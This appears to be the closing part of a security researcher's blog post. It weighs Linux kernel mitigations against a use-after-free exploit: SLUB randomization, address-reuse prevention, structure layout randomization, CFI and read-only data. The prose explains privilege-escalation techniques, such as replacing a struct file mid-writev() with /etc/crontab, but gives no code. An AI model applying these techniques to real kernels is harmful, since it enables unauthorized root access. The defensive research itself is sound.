[20, 6, 14, 16, 3, 19, 24, 11, 7, 8, 13, 18, 10, 29, 22, 0, 15, 5, 25, 26, 12, 28, 21, 4, 9, 1, 27, 23, 30, 17, 31, 2]
[5, 25, 26, 12, 28, 21, 4, 9, 1, 27, 23, 30, 17, 31, 2, 20, 6, 14, 16, 3, 19, 24, 11, 7, 8, 13, 18, 10, 29, 22, 0, 15]

And these sequences are almost the same, except that they have been rotated around by different amounts. This is exactly the SLUB freelist randomization scheme, as introduced in commit 210e7a43fa905!

When a SLUB kmem_cache is created (an instance of the SLUB allocator for a specific size class and potentially other specific attributes, usually initialized at boot time), init_cache_random_seq and cache_random_seq_create fill an array ->random_seq with randomly-ordered object indices via Fisher-Yates shuffle, with the array length equal to the number of objects that fit into a page. Then, whenever SLUB grabs a new page from the lower-level page allocator, it initializes the page freelist using the indices from ->random_seq, starting at a random index in the array (and wrapping around when the end is reached). (I'm ignoring the low-order allocation fallback here.)

So in summary, we can bypass SLUB randomization for the slab from which struct file is allocated because someone used it as a lookup key in a specific type of data structure. This is already fairly undesirable if SLUB randomization is supposed to provide protection against some types of local attacks for all slabs.

The heap-randomization-weakening effect of such data structures is not necessarily limited to cases where elements of the data structure can be listed in-order by userspace: If there was a codepath that iterated through the tree in-order and freed all tree nodes, that could have a similar effect, because the objects would be placed on the allocator's freelist sorted by address, cancelling out the randomization. In addition, you might be able to leak information about iteration order through cache side channels or such.

If we introduce a probabilistic use-after-free mitigation that relies on attackers not being able to learn whether the uppermost bits of an object's address changed after it was reallocated, this data structure could also break that. This case is messier than things like kcmp() because here the address ordering leak stems from a standard data structure.

You may have noticed that some of the examples I'm using here would be more or less limited to cases where an attacker is reallocating memory with the same type as the old allocation, while a typical use-after-free attack ends up replacing an object with a differently-typed one to cause type confusion. As an example of a bug that can be exploited for privilege escalation without type confusion at the C structure level, see entry 808 in our bugtracker. My exploit for that bug first starts a writev() operation on a writable file, lets the kernel validate that the file is indeed writable, then replaces the struct file with a read-only file pointing to /etc/crontab, and lets writev() continue. This allows gaining root privileges through a use-after-free bug without having to mess around with kernel pointers, data structure layouts, ROP, or anything like that. Of course that approach doesn't work with every use-after-free though.

(By the way: For an example of pointer leaks through container data structures in a JavaScript engine, see this bug I reported to Firefox back in 2016, when I wasn't a Google employee, which leaks the low 32 bits of a pointer by timing operations on pessimal hash tables - basically turning the HashDoS attack into an infoleak. Of course, nowadays, a side-channel-based pointer leak in a JS engine would probably not be worth treating as a security bug anymore, since you can probably get the same result with Spectre...)

Against freeing SLUB pages: Preventing virtual address reuse beyond the slab

(Also discussed a little bit on the kernel-hardening list in this thread.)

A weaker but less CPU-intensive alternative to trying to provide complete use-after-free protection for individual objects would be to ensure that virtual addresses that have been used for slab memory are never reused outside the slab, but that physical pages can still be reused. This would be the same basic approach as used by PartitionAlloc and others. In kernel terms, that would essentially mean serving SLUB allocations from vmalloc space.

Some challenges I can think of with this approach are:

  • SLUB allocations are currently served from the linear mapping, which normally uses hugepages; if vmalloc mappings with 4K PTEs were used instead, TLB pressure might increase, which might lead to some performance degradation.
  • To be able to use SLUB allocations in contexts that operate directly on physical memory, it is sometimes necessary for SLUB pages to be physically contiguous. That's not really a problem, but it is different from default vmalloc behavior. (Sidenote: DMA buffers don't always have to be physically contiguous - if you have an IOMMU, you can use that to map discontiguous pages to a contiguous DMA address range, just like how normal page tables create virtually-contiguous memory. See this kernel-internal API for an example that makes use of this, and Fuchsia's documentation for a high-level overview of how all this works in general.)
  • Some parts of the kernel convert back and forth between virtual addresses, struct page pointers, and (for interaction with hardware) physical addresses. This is a relatively straightforward mapping for addresses in the linear mapping, but would become a bit more complicated for vmalloc addresses. In particular, page_to_virt() and phys_to_virt() would have to be adjusted.
    • This is probably also going to be an issue for things like Memory Tagging, since pointer tags will have to be reconstructed when converting back to a virtual address. Perhaps it would make sense to forbid these helpers outside low-level memory management, and change existing users to instead keep a normal pointer to the allocation around? Or maybe you could let pointers to struct page carry the tag bits for the corresponding virtual address in unused/ignored address bits?

The probability that this defense can prevent UAFs from leading to exploitable type confusion depends somewhat on the granularity of slabs; if specific struct types have their own slabs, it provides more protection than if objects are only grouped by size. So to improve the utility of virtually-backed slab memory, it would be necessary to replace the generic kmalloc slabs (which contain various objects, grouped only by size) with ones that are segregated by type and/or allocation site. (The grsecurity/PaX folks have vaguely alluded to doing something roughly along these lines using compiler instrumentation.)

After reallocation as pagetable: Structure layout randomization

Memory safety issues are often exploited in a way that involves creating a type confusion; e.g. exploiting a use-after-free by replacing the freed object with a new object of a different type.

A defense that first appeared in grsecurity/PaX is to shuffle the order of struct members at build time to make it harder to exploit type confusions involving structs; the upstream Linux version of this is in scripts/gcc-plugins/randomize_layout_plugin.c.

How effective this is depends partly on whether the attacker is forced to exploit the issue as a confusion between two structs, or whether the attacker can instead exploit it as a confusion between a struct and an array (e.g. containing characters, pointers or PTEs). Especially if only a single struct member is accessed, a struct-array confusion might still be viable by spraying the entire array with identical elements. Against the type confusion described in this blogpost (between struct pid and page table entries), structure layout randomization could still be somewhat effective, since the reference count is half the size of a PTE and therefore can randomly be placed to overlap either the lower or the upper half of a PTE. (Except that the upstream Linux version of randstruct only randomizes explicitly-marked structs or structs containing only function pointers, and struct pid has no such marking.)

Of course, drawing a clear distinction between structs and arrays oversimplifies things a bit; for example, there might be struct types that have a large number of pointers of the same type or attacker-controlled values, not unlike an array.

If the attacker can not completely sidestep structure layout randomization by spraying the entire struct, the level of protection depends on how kernel builds are distributed:

  • If the builds are created centrally by one vendor and distributed to a large number of users, an attacker who wants to be able to compromise users of this vendor would have to rework their exploit to use a different type confusion for each release, which may force the attacker to rewrite significant chunks of the exploit.
  • If the kernel is individually built per machine (or similar), and the kernel image is kept secret, an attacker who wants to reliably exploit a target system may be forced to somehow leak information about some structure layouts and either prepare exploits for many different possible struct layouts in advance or write parts of the exploit interactively after leaking information from the target system.

To maximize the benefit of structure layout randomization in an environment where kernels are built centrally by a distribution/vendor, it would be necessary to make randomization a boot-time process by making structure offsets relocatable. (Or install-time, but that would break code signing.) Doing this cleanly (for example, such that 8-bit and 16-bit immediate displacements can still be used for struct member access where possible) would probably require a lot of fiddling with compiler internals, from the C frontend all the way to the emission of relocations. A somewhat hacky version of this approach already exists for C->BPF compilation as BPF CO-RE, using the clang builtin __builtin_preserve_access_index, but that relies on debuginfo, which probably isn't a very clean approach.

Potential issues with structure layout randomization are:

  • If structures are hand-crafted to be particularly cache-efficient, fully randomizing structure layout could worsen cache behavior. The existing randstruct implementation optionally avoids this by trying to randomize only within a cache line.
  • Unless the randomization is applied in a way that is reflected in DWARF debug info and such (which it isn't in the existing GCC-based implementation), it can make debugging and introspection harder.
  • It can break code that makes assumptions about structure layout; but such code is gross and should be cleaned up anyway (and Gustavo Silva has been working on fixing some of those issues).

While structure layout randomization by itself is limited in its effectiveness by struct-array confusions, it might be more reliable in combination with limited heap partitioning: If the heap is partitioned such that only struct-struct confusion is possible, and structure layout randomization makes struct-struct confusion difficult to exploit, and no struct in the same heap partition has array-like properties, then it would probably become much harder to directly exploit a UAF as type confusion. On the other hand, if the heap is already partitioned like that, it might make more sense to go all the way with heap partitioning and create one partition per type instead of dealing with all the hassle of structure layout randomization.

(By the way, if structure layouts are randomized, padding should probably also be randomized explicitly instead of always being on the same side to maximally randomize structure members with low alignment; see my list post on this topic for details.)

Control Flow Integrity

I want to explicitly point out that kernel Control Flow Integrity would have had no impact at all on this exploit strategy. By using a data-only strategy, we avoid having to leak addresses, avoid having to find ROP gadgets for a specific kernel build, and are completely unaffected by any defenses that attempt to protect kernel code or kernel control flow. Things like getting access to arbitrary files, increasing the privileges of a process, and so on don't require kernel instruction pointer control.

Like in my last blogpost on Linux kernel exploitation (which was about a buggy subsystem that an Android vendor added to their downstream kernel), to me, a data-only approach to exploitation feels very natural and seems less messy than trying to hijack control flow anyway.

Maybe things are different for userspace code; but for attacks by userspace against the kernel, I don't currently see a lot of utility in CFI because it typically only affects one of many possible methods for exploiting a bug. (Although of course there could be specific cases where a bug can only be exploited by hijacking control flow, e.g. if a type confusion only permits overwriting a function pointer and none of the permitted callees make assumptions about input types or privileges that could be broken by changing the function pointer.)

Making important data readonly

A defense idea that has shown up in a bunch of places (including Samsung phone kernels and XNU kernels for iOS) is to make data that is crucial to kernel security read-only except when it is intentionally being written to - the idea being that even if an attacker has an arbitrary memory write, they should not be able to directly overwrite specific pieces of data that are of exceptionally high importance to system security, such as credential structures, page tables, or (on iOS, using PPL) userspace code pages.

The problem I see with this approach is that a large portion of the things a kernel does are, in some way, critical to the correct functioning of the system and system security. MMU state management, task scheduling, memory allocation, filesystems, page cache, IPC, ... - if any one of these parts of the kernel is corrupted sufficiently badly, an attacker will probably be able to gain access to all user data on the system, or use that corruption to feed bogus inputs into one of the subsystems whose own data structures are read-only.

In my view, instead of trying to split out the most critical parts of the kernel and run them in a context with higher privileges, it might be more productive to go in the opposite direction and try to approximate something like a proper microkernel: Split out drivers that don't strictly need to be in the kernel and run them in a lower-privileged context that interacts with the core kernel through proper APIs. Of course that's easier said than done! But Linux does already have APIs for safely accessing PCI devices (VFIO) and USB devices from userspace, although userspace drivers aren't exactly its main usecase.

(One might also consider making page tables read-only not because of their importance to system integrity, but because the structure of page table entries makes them nicer to work with in exploits that are constrained in what modifications they can make to memory. I dislike this approach because I think it has no clear conclusion and it is highly invasive regarding how data structures can be laid out.)

Conclusion

This was essentially a boring locking bug in some random kernel subsystem that, if it wasn't for memory unsafety, shouldn't really have much of a relevance to system security. I wrote a fairly straightforward, unexciting (and admittedly unreliable) exploit against this bug; and probably the biggest challenge I encountered when trying to exploit it on Debian was to properly understand how the SLUB allocator works.

My intent in describing the exploit stages, and how different mitigations might affect them, is to highlight that the further a memory corruption exploit progresses, the more options an attacker gains; and so as a general rule, the earlier an exploit is stopped, the more reliable the defense is. Therefore, even if defenses that stop an exploit at an earlier point have higher overhead, they might still be more useful.

I think that the current situation of software security could be dramatically improved - in a world where a little bug in some random kernel subsystem can lead to a full system compromise, the kernel can't provide reliable security isolation. Security engineers should be able to focus on things like buggy permission checks and core memory management correctness, and not have to spend their time dealing with issues in code that ought to not have any relevance to system security.

In the short term, there are some band-aid mitigations that could be used to improve the situation - like heap partitioning or fine-grained UAF mitigation. These might come with some performance cost, and that might make them look unattractive; but I still think that they're a better place to invest development time than things like CFI, which attempts to protect against much later stages of exploitation.

In the long term, I think something has to change about the programming language - plain C is simply too error-prone. Maybe the answer is Rust; or maybe the answer is to introduce enough annotations to C (along the lines of Microsoft's Checked C project, although as far as I can see they mostly focus on things like array bounds rather than temporal issues) to allow Rust-equivalent build-time verification of locking rules, object states, refcounting, void pointer casts, and so on. Or maybe another completely different memory-safe language will become popular in the end, neither C nor Rust?

My hope is that perhaps in the mid-term future, we could have a statically verified, high-performance core of kernel code working together with instrumented, runtime-verified, non-performance-critical legacy code, such that developers can make a tradeoff between investing time into backfilling correct annotations and run-time instrumentation slowdown without compromising on security either way.

TL;DR

memory corruption is a big problem because small bugs even outside security-related code can lead to a complete system compromise; and to address that, it is important that we:

  • in the short to medium term:

    • design new memory safety mitigations:
      • ideally, that can stop attacks at an early point where attackers don't have a lot of alternate options yet
        • maybe at the memory allocator level (i.e. SLUB)
      • that can't be broken using address tag leaks (or we try to prevent tag leaks, but that's really hard)
    • continue using attack surface reduction
      • in particular seccomp
    • explicitly prevent untrusted code from gaining important attack primitives
      • like FUSE, and potentially consider fine-grained scheduler control
  • in the long term:

    • statically verify correctness of most performance-critical code
      • this will require determining how to retrofit annotations for object state and locking onto legacy C code
      • consider designing runtime verification just for gaps in static verification
❌
❌